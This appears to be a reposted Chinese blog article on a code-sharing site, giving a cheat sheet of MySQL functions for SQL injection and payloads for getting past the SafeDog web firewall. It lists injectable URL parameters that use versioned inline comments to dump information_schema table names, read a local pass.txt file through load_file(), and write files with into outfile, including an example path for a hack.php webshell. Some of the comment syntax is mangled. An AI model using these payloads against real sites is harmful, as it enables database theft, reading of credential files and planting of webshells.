我是靠谱客的博主 安详裙子,最近开发中收集的这篇文章主要介绍mysql特性绕过安全狗_SQL注入原理及绕过安全狗,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

/.../

/!.../ 内联注释/*!50000select */(mysql版本大于50000执行)

[ ] mysql中一些函数

system_user()系统用户名

user()用户名

current_user()当前用户名

session_user()连接数据库的用户名

database() 数据库名

version()MySql数据库版本

load_file()MySql读取本地文件的函数

@@datadir 读取数据库路径

@@basedir MySql安装路径

@@version_compile_os 操作系统Windows Server 2003

[ ] mysql漏洞利用函数:into outfile()

into_outfile()写文件操作

前提:

文件名必须全路径(绝对路径),

用户必须有写文件的权限

没有对’单引号过滤

SELLECT''into outfile'D://phpStudy//WWW//hack.php'

[ ] mysql链接 字符串函数

concat(str1,str2)

concat_ws(separator,str1,str2...)

group_concat(str1,str2....)

MySql的concat函数可以连接一个或者多个字符串

concat(username,0x23,password,0x23...)

concat_ws()函数,表示concat with separator,即有分隔符的字符串连接

group_concat()函数,把每一行数据分到一个组里显示出来

[ ] mysql联合查询注入必备知识点

information_schema(mysql5.0)信息数据库。其中保存着关于MySql服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

SCHEMATA表:(所有的数据库名在这个表)提供了当前mysql事例中所有的数据库信息。是show databases的结果取之此表。

TABLES表:(所有的数据库的表名在这个表)提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建表的时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:(所有数据库的表名中的所有列在这个表)提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

[ ] mysql联合查询规则

UNION必须由两条或者两条以上的SELECT语句组成,语句之间用关键字UNION分隔

UNION中的每个查询必须包含相同的列

UNION会从查询结果集中自动去除了重复行

[ ]过狗语句

?id=-1 /!50001union//!50001select/1,table_name,3,4,5 /!50001from/ information_schema.tables where table_schema='newbaji'

load_file()读取可以单个斜线

?id=-1 /!50001union//!50001select/

1,load_file('d:/pass.txt'),3,4,5

into outfile 'd://aaa.txt'(写入必须双//)

?id=-1 /!50001union//!50001select/1,'',3,4,5 into outfile 'd:2.txt';

最后

以上就是安详裙子为你收集整理的mysql特性绕过安全狗_SQL注入原理及绕过安全狗的全部内容,希望文章能够帮你解决mysql特性绕过安全狗_SQL注入原理及绕过安全狗所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(55)

评论列表共有 0 条评论

立即
投稿
返回
顶部